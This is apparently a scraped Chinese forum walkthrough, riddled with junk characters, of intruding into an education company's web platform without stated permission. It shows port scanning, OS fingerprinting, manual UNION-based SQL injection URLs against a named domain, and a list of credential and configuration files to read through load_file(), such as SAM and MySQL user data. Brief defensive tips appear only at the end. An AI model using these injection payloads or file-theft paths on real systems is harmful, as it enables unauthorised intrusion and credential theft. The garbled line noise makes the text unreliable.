题记: }& {; X' w' U/ u" n( `
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
2 v! T2 y4 o& v2 i: p第一步:获取需要的信息
- z1 }1 ]9 }6 m& B' ?由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。6 y% b1 M& g7 O3 S2 k0 {8 s( m6 F
注:以下为保护特用XXX代替敏感信息& I$ b3 S4 t" P0 V. g X4 E1 n
顺手先PING了一下他们的域名:& B6 U* J; ]+ p* i v0 O8 m8 g
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)2 M, g/ w2 Q' _- g
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
3 Z1 P/ i, C' d顺便了解一下TTL,学好基础知识才能一路顺风:+ A+ g& {2 O- [) A0 M5 H
TTL:(Time To Live ) 生存时间( B9 z7 |/ B3 y1 u$ A
指定数据包被路由器丢弃之前允许通过的网段数量。
) C( a) B5 Y& e0 r4 u6 M7 LTTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
" `" |: P. z% q6 w) }/ g+ g- j使用PING时涉及到的 ICMP 报文类型
* @* h7 m' a. y9 }* ` P" S9 q) R一个为ICMP请求回显(ICMP Echo Request)5 M& b0 M0 u( W" t- m. A! ~2 i
一个为ICMP回显应答(ICMP Echo Reply)
" j) [' r* t1 u! x" ^TTL 字段值可以帮助我们识别操作系统类型。* b: I' X& f& i4 v. b/ a6 E
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255/ N7 W2 i: u. k' y2 o# D/ Q
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64# ~2 v& Z, E) N' P9 p4 D" T
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128! L0 F2 U# y4 j& u, O$ p. p, _
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32& r- Z t) M& y* Q7 }
当然,返回的TTL值是相同的
7 K% ~; g# A, z) k9 E6 o# V% I3 x但有些情况下有所特殊) n5 B/ m3 [, @ K6 \2 _+ _- Z
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64
) h7 h) [2 C/ a/ i% k" C$ VFreeBSD 4.1, 4.0, 3.4;
0 {5 q' V6 p5 fSun Solaris 2.5.1, 2.6, 2.7, 2.8;2 E2 m1 r7 n1 }- W! J ~! @; @1 F
OpenBSD 2.6, 2.7,
; E3 P" |9 }$ K; ]) n0 r0 t& jNetBSD
/ x* K) f' H( _1 MHP UX 10.20
' i8 Y0 ^7 J+ b$ ]5 Z H4 PICMP 回显应答的 TTL 字段值为 2554 ^: C' F, W. j& X* u* C, K
Windows 95/98/98SE
3 e, Z& r8 d1 w4 [- ~% pWindows ME
' A, T1 {$ `# g- t8 D* i* q2 D7 uICMP 回显应答的 TTL 字段值为 32# A5 F- z6 F6 S! h5 C, B5 u8 U2 u
Windows NT4 WRKS- ?7 K4 S0 l0 y- s3 W- W
Windows NT4 Server
4 ?" B. K/ O0 {5 t% v, O( b1 sWindows 2000" J" r8 a( x1 w" X3 z r
Windows XP
8 h: o2 I7 L+ X T2 B0 a+ y" b) s PICMP 回显应答的 TTL 字段值为 128+ n" b, ?& o- z) q
这样,我们就可以通过这种方法来辨别操作系统
) V6 i" P- `4 d' O% O; `( S8 q# ZTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
0 ~9 E( \' j* u用NMAP扫描一下:0 a9 v# l; T. V/ H- t
nmap -sT -O XXX.XXX.XXX.XXX
1 v. }5 J* S; j" `如果没有装WinPcap则会弹出提示:7 W/ g) z# Z( n
WARNING: Could not import all necessary WinPcap functions. You may need to upgr
* y% L3 X1 R; u" U V$ I3 Oade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
# r2 ]9 D2 M5 A# T# x3 t$ w) mode — Nmap may not function completely
) M5 T2 |, S6 KTCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher3 f2 ~! D, `7 h
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win
) A. m9 O: O6 \2 y3 N0 h' ~+ dpcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an9 F' J( F( v% u8 g
d later operating sytems and NT 4.0 with SP4 or greater. For previous windows v, A& E, ^$ y1 [! n+ G
ersions, you may be able to take iphlpapi.dll from another system and place it i8 d2 Y# ?7 [% _+ r
n your system32 dir (e.g. c:\windows\system32).( \( \, ^2 w& x# ~
QUITTING!
# x) s5 H* P+ A( q; n* ?) Y2 R到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe9 e2 i- Q$ Q- z; |
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
* ]) b& F1 s) O/ B2 @+ y2 WInteresting ports on XXX.XXX.XXX.XXX:
& ~9 H b7 h4 h* O: FNot shown: 986 closed ports# D$ ] s' Z% d" S. x" G
PORT STATE SERVICE5 t. @5 i/ G- J6 ?/ i# }, s
21/tcp open ftp
5 `8 v$ c6 m; S3 S/ v22/tcp open ssh+ D$ k7 m3 h7 B
23/tcp open telnet
* ^! j L0 N0 q& x& S9 C0 v m80/tcp open http
% I( s; _. z( B7 G, `/ ~9 F% Z111/tcp open rpcbind4 y$ d2 \ d1 r1 ?3 D6 ?* F r( r
135/tcp filtered msrpc& H( H8 ?1 R) _7 P4 T! k
139/tcp filtered netbios-ssn
: H6 O4 Y5 h6 W# b" B3 U! x445/tcp filtered microsoft-ds; C! c5 N) g/ n7 K. ~$ s
513/tcp open login
) k/ l1 H; q$ j4 i5 w8 [2 ~514/tcp open shell3 i4 s; l+ l& ]; p
593/tcp filtered http-rpc-epmap, K% C: }* J A, w/ j
1720/tcp filtered H.323/Q.9318 p$ ^7 [ C8 f
3306/tcp open mysql! q/ g9 m2 s8 n% [
4444/tcp filtered krb524
; P2 E0 T4 d1 ]" M- h. t) _: EDevice type: WAP
2 U, e7 S8 P0 E1 Q6 {7 NRunning: Linux 2.4.X5 g/ A* ^ c7 Y ~9 b5 A9 @" c
OS details: DD-WRT (Linux 2.4.35s)
X, p* ^! [; I( sNetwork Distance: 13 hops: u# ?+ P9 g3 r, K: Z
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
0 b) I- o) V' s5 ]8 A" Nlogin as:, u" h2 R. W* c( Y& s) T: E* ]" d
Telnet23端口也是开着的,用telnet 命令链接一下:
$ `( }0 S' n1 K8 Ptelnet XXX.XXX.XXX.XXX
9 O4 {) e s- O# t6 I% b, i提示:# u' s% t# F7 [, ` ^
Red Hat Enterprise Linux Server release 5.2 (Tikanga)- ^8 K+ b. e2 S+ V
Kernel 2.6.18-92.el5PAE on an i686
! R, n8 W4 H9 wlogin:+ a0 Z/ b& d5 Q3 y& K2 S: {
获取HTTP头信息:5 {5 L7 I( O+ y
在本地执行如下PHP代码
" F( q' D7 o! F/ L<?php# S; x9 g5 S; j, p# J! U" t
$url = ‘XXX.XXX.XXX.XXX’;! Y& k! s1 m! V. [$ S, Y9 G3 ^
print_r(get_headers($url));
' S9 {' N E+ J% bprint_r(get_headers($url, 1));
8 u E, \ Y- F6 m; Z; {( Y?>' ]! H' B0 Z# J: |3 y# }
将以上代码保存为PHP文件,执行:0 H A2 a1 _3 a+ _
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
( H7 f4 e: `* l. G4 N: P" Q! u9 N1 E9 g现在可以得出结论:1 `; p) f; R% H i/ ~& a* [* K+ H
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)' f# ~0 {/ {! s) W& G |6 h1 Q7 `
内核版本:Kernel 2.6.18-92.el5PAE on an i6861 ?+ T1 z$ V; `# X2 x
WEB服务器版本:nginx/0.7.61' r) J4 C2 Q( E
第二步,开始测试寻找漏洞
( ?0 M7 `/ d; [7 r& J9 f分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。) z0 f! G9 V$ H, J. i0 }! o$ Y
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的
, u# w' g+ E4 i. D% y. T2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
6 d* Z9 E* m4 k0 Z9 R3 _http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常, m7 v+ g2 n8 t1 F9 ^' W
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误# I. O: F+ J( ~9 e* E( M, D) K* ]! D1 G
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
, b! g. s% ]% y$ o% T% u3、手工注入: L; ~3 ?- Y/ e r9 \* Q
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
6 C9 T* X+ q3 Z1 ?! K3.1 猜测当前表字段数
5 T" j- |" ]/ q- h- o# Mhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10, J3 {7 Q) G7 {: b# a
此处猜测有个简单的算法,都是有技巧的吗,呵呵
/ x2 \4 n% o& B0 W算法简单如下:
$ G* ]+ @0 ~# X% v+ X3 K4 v第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;5 ^2 `" J U- k: G4 x
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;" E2 b1 l# I0 H3 ?; T
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。/ Q7 R: K3 x: I2 ]$ c& y
以此来判断,是否过界,配合取中算法猜出字段数。
. s" B% F1 q- N1 _8 B; Y举例:: q J& _# _! P
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
& i& ~/ o9 W% ^/ u4 s( O# s! Dhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误, p3 L S2 l$ x0 d# |! f9 g+ g
此时3则为我们要找的字段数。6 ^" k/ f2 ^ a: q( B
3.2 配合union联合查询字段在页面所位置* B4 \: J9 A2 x3 I0 U
我们已经知道了字段数为3,此时则可以做如下操作:
4 K1 Y2 P5 m; f9 Xhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3- r6 F3 }. A* k& D" L5 v, Y5 c
0 W5 H( V Z3 V0 u' |$ f% d
这样就可以测试到哪些字段在页面上有所显示了,如图:/ ^- A! {+ J; B% c* C
' v3 G) H Q. G/ q( o5 a
3.3 查敏感信息8 M' I- T* F1 ~+ W3 F
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。- S4 o3 O6 T9 J6 @7 I
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
2 e6 H0 ^3 R& N) V) h7 e2 n3.3.1 先查数据库用户、数据库名,以备后用,如图:
7 v, |- v* X# y
. v( F1 s3 u) S% Z得到数据库用户为root、数据库名为DBxx;
+ U9 t* q& n) |! b, M! \% B3.3.2 查配置文件% K, Q4 S4 d5 P. [2 m
查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。6 v& O/ l" H$ X" k
查看文件有一定的条件限制:! |1 B u; q+ ~5 M9 \' \( s
欲读取文件必须在服务器上
( a) E) M" }0 Y必须指定文件完整的路径
! P& h; w& d/ x. ^- L$ `+ c必须有权限读取并且文件必须完全可读
' G I& ~. y3 E7 r3 d欲读取文件必须小于 max_allowed_packet8 O) G+ v4 W! K* [) O* \ h2 D
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
1 d9 V7 S4 b: J! f6 K常用的一些:
3 [1 I; P; | Z4 R' j; a, ^/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件! T y$ [# H( B. F J s; b) q9 E
/usr/local/apache2/conf/httpd.conf
0 `4 o4 [6 u* B5 }/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
4 m4 C/ P. j% _/usr/local/app/php5/lib/php.ini //PHP相关设置* }' g9 Q2 @ D+ I
/etc/sysconfig/iptables //从中得到防火墙规则策略* e E: i# a% R3 T% {
/etc/httpd/conf/httpd.conf // apache配置文件+ ?1 K! D' D' ?; H' W
/etc/rsyncd.conf //同步程序配置文件
% R9 ], O* t6 X8 w7 O) t/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.- T; f6 \) Q3 r' e6 c9 v' F7 Z3 @- Z! |
/etc/my.cnf //mysql的配置文件
5 a6 c; f: t; u; L/ q- f/etc/redhat-release //系统版本
. D" {1 G; r& e/etc/issue0 C$ T' t5 |* k. B) _) \; ^# T+ ^
/etc/issue.net9 C6 c" A$ |. q- |+ U+ z$ `
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
% I+ b5 ^% b" N, X6 W' x! _2 X5 dc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码+ d: [ P# B* w$ |4 a0 c1 r
c:\Program Files\Serv-U\ServUDaemon.ini
1 ?2 t, c6 ?# {* I w, Q* |( Cc:\windows\my.ini //MYSQL配置文件
6 p' p2 V' l4 h2 Xc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件8 v3 Q1 K7 o2 m. k/ y& Z
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,
f# x7 T6 K- E7 }7 m6 w- _8 gc:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
; M% |3 W/ ]2 ]8 j* t' Gc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
! t. i$ o5 v# L. Q+ Q% vc:\Program Files\RhinoSoft.com\ServUDaemon.exe
( Q z3 G3 s) D4 ^9 _' EC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
6 B5 `5 j$ X1 f) }3 a, O//存储了pcAnywhere的登陆密码+ W! w& p) n+ N. G \/ s
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。$ F5 c4 O5 F H/ w5 P# o
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。# f/ W" @6 x4 b# D; y
最后:防范措施' ]+ e+ ?1 v$ x7 S6 T% a
1、修复PHP注入漏洞;
1 t" j$ k) H2 \- V9 [2、Mysql使用普通权限的用户;# p; B$ n- X4 }- M3 f: o
3、升级linux内核至最新版本; |